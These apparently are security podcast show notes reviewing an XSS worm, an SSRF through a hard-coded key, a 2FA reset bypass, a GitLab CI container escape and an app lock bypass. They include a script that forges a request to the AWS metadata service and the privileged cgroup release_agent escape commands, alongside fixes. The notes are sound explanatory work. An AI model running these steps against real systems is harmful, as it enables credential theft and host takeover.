Show Notes

XSS for NFTs, a VMWare Workspace ONE UEM SSRF, and GitLab CI Container Escape

The attack hides a cross-site scripting payload in the profile update functionality, specifically the profile image. Judging from the payload, it looks like a straightforward case of unescaped input reflected on profile pages, though they did need to contend with Cloudflare’s WAF. Since this was a profile feature, anyone viewing your profile would in turn execute the XSS payload, which could set itself as the viewer’s own profile picture, worming its way through the Rarible NFT Marketplace.

In terms of an actual attack beyond the worming, an interesting point is raised about web3 browser extensions being accessible from any page, without cookies. So an XSS payload, even one running in an otherwise empty context, could still trigger blockchain-related prompts, like asking you to sign a transaction. Granted, a “sign this transaction” prompt appearing on a random page would probably be pretty suspicious, but I thought it was an interesting attack surface to expose.

Hard-coded credentials strike again, enabling a couple of server-side request forgeries, as the URL to be requested was inside an encrypted, but user-provided, Url parameter. Within the application there were a couple of endpoints that took a Url parameter; their purpose was to serve up cached requests or to make/proxy those requests, so something in the Url parameter determined the request that would be made.

What was found was that a custom encryption/decryption class (DataEncryption.DecryptString(...)) was being used to decrypt the parameter, which is a huge red flag when reading code: not rolling your own crypto includes not rolling your own crypto protocols. The Url parameter turned out to be a base64-encoded string with several colon-separated values:


Of note for this vulnerability is the keyVersion field: when set to kv0, the server would fall back to a hard-coded key to decrypt the provided ciphertext. Knowing this, one could encrypt their own data using the hard-coded key and have the server make a request to a destination of their choosing. They were able to use this to reach the AWS instance metadata service and leak instance credentials.
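To make the kv0 fallback concrete, here is a toy sketch of the forgery. The real cipher and field layout aren’t public, so this uses a stand-in keystream-XOR cipher; the hard-coded key value and token structure are my own invention, only the kv0 fallback behavior mirrors the writeup:

```python
import base64
import hashlib

# Hypothetical stand-in for the app's cipher; key value is made up.
HARDCODED_KEY = b"legacy-key-baked-into-the-binary"  # the kv0 fallback key

def keystream(key: bytes, n: int) -> bytes:
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:n]

def xor_crypt(key: bytes, data: bytes) -> bytes:
    # Symmetric: same call encrypts and decrypts
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))

def make_url_param(target: str) -> str:
    # Attacker crafts a token claiming keyVersion "kv0", so the server
    # decrypts it with the key baked into its own binary
    ciphertext = xor_crypt(HARDCODED_KEY, target.encode())
    token = b"kv0:" + base64.b64encode(ciphertext)
    return base64.b64encode(token).decode()

def server_decrypt(param: str) -> str:
    token = base64.b64decode(param)
    key_version, b64ct = token.split(b":", 1)
    assert key_version == b"kv0"  # the vulnerable fallback path
    return xor_crypt(HARDCODED_KEY, base64.b64decode(b64ct)).decode()

param = make_url_param("http://169.254.169.254/latest/meta-data/")
print(server_decrypt(param))  # server now requests the attacker's URL
```

Because the decryption key is in the shipped binary and there is no integrity check, anyone can mint a valid-looking parameter pointing wherever they like.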

To me, this comes across as an inappropriate use of encryption where signing would have made more sense. Granted, there may have been a reason the requested URLs also needed to remain secret, in which case encryption makes sense. But if the goal is simply to prevent the end user from crafting their own destinations, signing the URL with an HMAC or a public-key signature would have been sufficient.
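A minimal sketch of that signing alternative, using Python’s standard-library hmac (the secret and URL here are hypothetical):

```python
import base64
import hashlib
import hmac

# Server-side secret; never leaves the server, unlike an embedded decryption key
SERVER_SECRET = b"server-side-secret-never-shipped-to-clients"

def sign_url(url: str) -> str:
    # MAC over the destination URL; the client receives url + tag
    tag = hmac.new(SERVER_SECRET, url.encode(), hashlib.sha256).digest()
    return base64.urlsafe_b64encode(tag).decode()

def verify_url(url: str, tag: str) -> bool:
    # Server refuses any URL it didn't sign itself
    return hmac.compare_digest(sign_url(url), tag)

allowed = "https://cdn.example.com/cached/item/42"
tag = sign_url(allowed)
print(verify_url(allowed, tag))                    # True: server-issued URL
print(verify_url("http://169.254.169.254/", tag))  # False: forged destination rejected
```

The URL stays visible to the client, but tampering with it invalidates the tag, which is exactly the property the Url parameter needed.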

Video Correction: During the discussion on crypto I made a reference to an “AED” mode of operation; in my head I was thinking of AEAD (Authenticated Encryption with Associated Data). But that is not a mode of operation, just a term for a type of cryptosystem. What I actually had in mind was AES-GCM (Galois/Counter Mode), which uses authentication tags to provide an authenticated cryptosystem.

Probably as easy a 2FA bypass as I’ve seen. If the account had 2FA enabled, the second stage of the password reset form would submit to /reset2fa; if no 2FA was registered for the account, it would submit to /reset. So the attack was simply to modify the submission to point to /reset instead of /reset2fa, and it wouldn’t prompt for the 2FA token.
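The server-side code isn’t shown in the report, but the flaw boils down to trusting the client to pick the endpoint. A hypothetical reconstruction of the vulnerable logic:

```python
# Hypothetical reconstruction: both endpoints exist, and only the
# client-rendered form decides which one gets hit.
users = {"victim": {"has_2fa": True}}

def valid_token(user, token):
    # Stub: real implementation would check a TOTP code
    return False

def reset2fa(user, token):
    # The endpoint the form submits to when the account has 2FA
    if users[user]["has_2fa"] and not valid_token(user, token):
        return "2FA token required"
    return "password reset"

def reset(user):
    # The bug: no 2FA check at all, yet still reachable
    # for accounts that have 2FA enabled
    return "password reset"

print(reset2fa("victim", None))  # 2FA token required
print(reset("victim"))           # password reset -- the bypass
```

The fix is equally simple: /reset must itself check whether the account has 2FA registered rather than assuming only non-2FA accounts will call it.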

Container escape within GitLab CI runners abusing cgroups’ release_agent functionality, as CI jobs are allowed to mount filesystems. The release_agent is a script that will be executed on the host when a cgroup hierarchy becomes empty.

So the attacker can mount -t cgroup ... (this requires a --privileged container) at some mount point, enable notify_on_release, and write the path of a release_agent script. That agent script will then be executed on the host system. The release_agent technique is fairly well known, and Trail of Bits has done a pretty detailed writeup on it.
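The steps above can be sketched as a dry run that only prints the commands a real PoC would execute (actually running them requires a --privileged container; the paths follow the well-known public PoCs, and the host-side payload path is hypothetical):

```python
# Dry run of the cgroup release_agent escape: builds and prints the command
# sequence instead of performing it. /payload.sh stands in for the payload's
# path as resolved on the HOST, which a real PoC must work out separately.
mountpoint = "/tmp/cgrp"
child = f"{mountpoint}/x"
payload = "/payload.sh"  # hypothetical host-side path

commands = [
    # 1. Mount a cgroup v1 hierarchy (only possible when privileged)
    f"mount -t cgroup -o rdma cgroup {mountpoint}",
    f"mkdir {child}",
    # 2. Arm the release mechanism: release_agent runs on the host
    f"echo 1 > {child}/notify_on_release",
    f"echo {payload} > {mountpoint}/release_agent",
    # 3. Add a short-lived process; when it exits the cgroup empties
    #    and the kernel invokes the release_agent on the host
    f"sh -c 'echo $$ > {child}/cgroup.procs'",
]
print("\n".join(commands))
```

Nothing here is exotic, which is part of the author’s point: removing --privileged from the runner configuration closes the whole class.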

The author here didn’t go beyond the container escape, and GitLab has indicated that there is limited impact with the keys that could be leaked, the Google Cloud Service keys for example only being useful for logging (it’s unclear if this is still the case, as that is from a 2019 report). GitLab closed the report as informational and is okay with this risk. It’s true that on its own this might not be a very useful breakout, as it is a container inside a VM. However, it is potentially the first stage in a full breakout and, in my opinion, worth fixing, especially as the author points out there doesn’t appear to be a strong reason for running the container as privileged.

Simple bypass of the (optional) password lock screen by force-killing the application a few times. The exact cause of this is unclear. I have seen something similar previously where it was a “feature”: the developers thought the app was crashing at that point, so they disabled the lock to let the user continue using the application. That doesn’t appear to be the case here, thankfully, but we don’t get much information on the root cause. It is an interesting test case to keep in mind though; force-killing applications can introduce some interesting bugs, often without security consequences, but still worth exploring.
